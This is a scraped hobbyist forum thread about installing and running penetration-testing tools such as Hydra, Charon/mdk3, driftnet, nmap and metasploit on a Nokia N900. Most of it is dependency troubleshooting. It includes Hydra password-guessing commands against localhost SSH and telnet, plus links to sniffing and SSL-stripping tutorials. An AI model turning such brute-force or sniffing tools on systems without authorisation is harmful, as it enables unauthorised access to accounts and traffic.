Hydra (http://www.thc.org/thc-hydra) starting at 2012-02-28 12:47:21
[DATA] 1 task, 1 server, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking service ssh on port 22
hydra: symbol lookup error: hydra: undefined symbol: ssh_new
[STATUS] attack finished for 127.0.0.1 (waiting for children to finish)
1 of 1 target successfuly completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2012-02-28 12:47:21

Nokia-N900:~# hydra -l root -p qazwsx 127.0.0.1 telnet -vv
Hydra v7.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2012-02-28 12:49:11
[WARNING] telnet is by its nature unreliable to analyze reliable, if possible better choose FTP or SSH if available
[VERBOSE] More tasks defined than login/pass pairs exist. Tasks reduced to 1.
[DATA] 1 task, 1 server, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking service telnet on port 23
[VERBOSE] Resolving addresses ... done
[STATUS] attack finished for 127.0.0.1 (waiting for children to finish)
1 of 1 target successfuly completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2012-02-28 12:49:11

sudo apt-get install libidn11

sudo apt-get install libssh libmysqlclient libpq libssl pkg-config libgtk2.0

ln -s /usr/lib/libss.so.1.0.0 /usr/lib/libssl1.so.1.0.0

but still not working last hydra from post 207


i try
1,apt-get install libidn11 libpq5 libssh2-1 libcrypt
2,ln -s /usr/lib/libss.so.1.0.0 /usr/lib/libssl.so.1.0.0
3,ln -s /usr/lib/libssh2.so.1 /usr/lib/libssh.so.4
4,ln -s /usr/lib/libcrypto.so.0.9.8 /usr/lib/libcrypto.so.1.0.0

still no luck

@karam
Great efforts are put by you!
I am new to pentesting. Can you help me how to use these pentesting tools? Any tutorials for usage? Any videos? Pl help.

I am a windows user...

sudo apt-get install libidn11

sudo apt-get install libssh libmysqlclient libpq libssl pkg-config libgtk2.0

ln -s /usr/lib/libss.so.1.0.0 /usr/lib/libssl1.so.1.0.0

but still not working last hydra from post 207


i try
1,apt-get install libidn11 libpq5 libssh2-1 libcrypt
2,ln -s /usr/lib/libss.so.1.0.0 /usr/lib/libssl.so.1.0.0
3,ln -s /usr/lib/libssh2.so.1 /usr/lib/libssh.so.4
4,ln -s /usr/lib/libcrypto.so.0.9.8 /usr/lib/libcrypto.so.1.0.0

still no luck

Ok, I need to change my development environment. I had compiled the openssl 1.0.0.e library from the website and was testing it on my device, but official maemo one is 0.9.8. Sorry about the f@ck up. Will post a new compiled version soon. For those who are interested run the following in x-termldd hydra and you will see which libraries are compiled into it. libssl and libcrypto are there twice. Will post more specifics on the required dependencies with the next version as well.

Any help for you guys

Any help for you guys

Looks like that is not my latest compiled version, all you have in there is the openssl libraries (libcrypto and libssl). All the other libraries should already be on the system (check /usr/lib). To get the openssl libraries try thissudo apt-get install openssl.

I have the latest version of openssl. I install the first version of hydra 7.2 and is working fine.

I have the latest version of openssl. I install the first version of hydra 7.2 and is working fine.
Yep, for now the first (http://talk.maemo.org/showpost.php?p=1169619&postcount=201) version is best until I have sorted out the dependencies. I have now a compiled version that only requires openssl 0.9.8n, but still looking into getting all the other dependencies (like libssh, libidn, etc.) in order so that people can run the version with the most functionality enabled. Should be out over the weekend.

Well i loaded up charon and it aint in english does anybody know how to change it ??

seems like a cool app from what research i done on it ...

i tried to run driftnet. how to do that? i failed. can you please help me

Well i loaded up charon and it aint in english does anybody know how to change it ??

seems like a cool app from what research i done on it ...

Stevomanu

How did you load up Charon?
I installed it but no icon, so i went to xterminal under sudo gainroot and it then typed "charon2.0" but get permission denied

any help would be fantastic

Nick

Try this command as root

java -jar /opt/charon2.0.1-karam/CHARON_2.0.1.jar

Stevomanu

How did you load up Charon?
I installed it but no icon, so i went to xterminal under sudo gainroot and it then typed "charon2.0" but get permission denied

any help would be fantastic

Nick

Try this command as root

java -jar /opt/charon2.0.1-karam/CHARON_2.0.1.jar

Genius!! thanks!

errm its in French. Damn! do we know if anyone is working on it?

how to load up driftnet too. i also tried many commands.

Genius!! thanks!

errm its in French. Damn! do we know if anyone is working on it?

i just open xterm and typed charon and it worked fine for me.

i just open xterm and typed charon and it worked fine for me.

thanks spuddy! that works too!

what the hell was i doing before to make it not work?!

how to run driftnet then? just typing driftnet doesnot work. i enabled ip forwarding. how to use driftnet? i also created a folder in MyDocs for the images to be stored there

This might help , great site for other security stuff so i dont see why not ....

http://www.securitytube.net/video/664


how to run driftnet then? just typing driftnet doesnot work. i enabled ip forwarding. how to use driftnet? i also created a folder in MyDocs for the images to be stored there

i'm wondering why i'm getting

"E: Couldn't find package xxxx"

when i apt-get install...?

Well it would help if we had a clue as to what your trying to install. ..

i'm wondering why i'm getting

"E: Couldn't find package xxxx"

when i apt-get install...?

was trying to install the whole thing..

"apt-get install nmap driftnet yamas wireshark charon etc2"

fixed it by enabling the repos in app manager..i've disabled it before because i'm using FAPman instead of "apt-get install"..cheers!

btw, charon is in what language?lol..can't seem to understand it...it's nice to have a GUI for mdk3...hmmpph!! =D

i get this while trying to open charon::

Nokia-N900:~# java /jar /opt/charon2.0.1-karam/CHARON_2.0.1.jar
Exception in thread "main" java.lang.NoClassDefFoundError: /jar
Caused by: java.lang.ClassNotFoundException: .jar
at java.net.URLClassLoader$1.run(URLClassLoader.java: 217)
at java.security.AccessController.doPrivileged(Native Method)
at java.net.URLClassLoader.findClass(URLClassLoader.j ava:205)
at java.lang.ClassLoader.loadClass(ClassLoader.java:3 21)
at sun.misc.Launcher$AppClassLoader.loadClass(Launche r.java:294)
at java.lang.ClassLoader.loadClass(ClassLoader.java:2 66)
at java.lang.ClassLoader.loadClassInternal(ClassLoade r.java:334)
Could not find the main class: /jar. Program will exit.
Nokia-N900:~#

i get this while trying to open charon::

Nokia-N900:~# java /jar /opt/charon2.0.1-karam/CHARON_2.0.1.jar
Exception in thread "main" java.lang.NoClassDefFoundError: /jar
Caused by: java.lang.ClassNotFoundException: .jar
at java.net.URLClassLoader$1.run(URLClassLoader.java: 217)
at java.security.AccessController.doPrivileged(Native Method)
at java.net.URLClassLoader.findClass(URLClassLoader.j ava:205)
at java.lang.ClassLoader.loadClass(ClassLoader.java:3 21)
at sun.misc.Launcher$AppClassLoader.loadClass(Launche r.java:294)
at java.lang.ClassLoader.loadClass(ClassLoader.java:2 66)
at java.lang.ClassLoader.loadClassInternal(ClassLoade r.java:334)
Could not find the main class: /jar. Program will exit.
Nokia-N900:~#

open terminal, type charon..

don't have to be root i guess..i launched it that way..and perhaps u don't have icedtea6 installed?

thanks. that did it. itreid that before but dint work. charon is in diff language.i cant hange the language to english. how to do that sir?

thanks. that did it. itreid that before but dint work. charon is in diff language.i cant hange the language to english. how to do that sir?

i have no idea how to change it to english..i think u have to change the jar files..but i can't seem to b able to edit it using jar editor..lol..and i dont know which file to edit as well..haha

So whats the point? Cant use it anyway. I can perform b a and d with xterminal. Works like a charm. So the peolple who doesnt kno this language cannot use it? Y wud even any1 use this language.

So whats the point? Cant use it anyway. I can perform b a and d with xterminal. Works like a charm. So the peolple who doesnt kno this language cannot use it? Y wud even any1 use this language.

well if i can find a good java editor and a french translator i might give
it a try lol

hi ,karam and everybody.
i compiled and make install Nmap 5.61TEST5 on my N900,,but can't work. input:nmap --iflist ,output:INTERFACES: NONE FOUND(!) ,ROUTES: NONE FOUND(!)
has someone interest ,let Nmap 5.61 work on N900.

Search for nmap thread - it was compiled already. It was working fine for some time, but since a mainstream update, this problem appears, when nmap is run as root.

As user, "INTERFACES" NONE FOUND(!)" doesn't appear, but, obviously, You can't use features that require root privileges.

If You're able and would like to take over maintainership of nmap, it would be great, as it seems that original maintainer gave up on this. But please, use an existing thread for further discussion. If You'll be able to figure out how to fix this "root bug", I would bless You ;)

/Estel

// Edit:

nmap thread:
http://talk.maemo.org/showthread.php?t=48673

sorry guys i have been off for a while

as for charon
well the creator of it is french
it would be so appreciated if someone can change the language of it

as for launching charon
doesn't the shortcut work ? i remember that last version is fixed?

still planning to launch another gui for mdk3
ENGLISH and much more smoother and doesn't need the buggy icedtea6

@Estel. psychologe
i guess i will be able to fix nmap
i'll work on it as soon as i have a free time :)

sorry guys i have been off for a while

as for charon
well the creator of it is french
it would be so appreciated if someone can change the language of it

as for launching charon
doesn't the shortcut work ? i remember that last version is fixed?

still planning to launch another gui for mdk3
ENGLISH and much more smoother and doesn't need the buggy icedtea6

@Estel. psychologe
i guess i will be able to fix nmap
i'll work on it as soon as i have a free time :)

Apparently when karam fixed problems in shortcut, made ​​a mistake instead of directing to applications, you did to application folder.:D

I have the shortcut charon, I did so, in filefox access /usr/share/application/hildon copy and paste charon.desktop file in /usr/share/applications/hildon and ready will have shortcut charon.

I hope someone charon translated into other languages ​​(en, sp, etc.):D:D

oh typos are my worst fears

just uploaded a quik fix
thank you for reporting :)

I only looked at your metaspolit post but your packages are a little outdated in the post , have a look here at newest working ones ....

http://talk.maemo.org/showthread.php?t=81816

Great job thou ...



@karam
I post in Phonesfera.com (http://www.phonesfera.com/) how to install metasploit, ettercap, sslstrip, backtrack and more...
Tutorial Metasploit (Spanish) (http://www.phonesfera.com/tutoriales-maemo-5/4540-%5Btutorial%5D-metasploit-n900.html)
Tutorial Ettercap & Sslstrip (Spanish) (http://www.phonesfera.com/tutoriales-maemo-5/4027-%5Btutorial%5D-ettercap-sslstrip.html)
Tutorial Backtrack (Spanish) (http://www.phonesfera.com/tutoriales-maemo-5/4752-%5Btutorial%5D-backtrack-5-en-el-n900-trav%E9s-de-presencevnc-inestable.html)

yep my post have one year ago. ty for the updates, update my tutorial now

No problem i also made a post on SET aswell have a look at that ....

http://talk.maemo.org/showthread.php?t=81964

...

yep my post have one year ago. ty for the updates, update my tutorial now

What is is, a positioning spam?...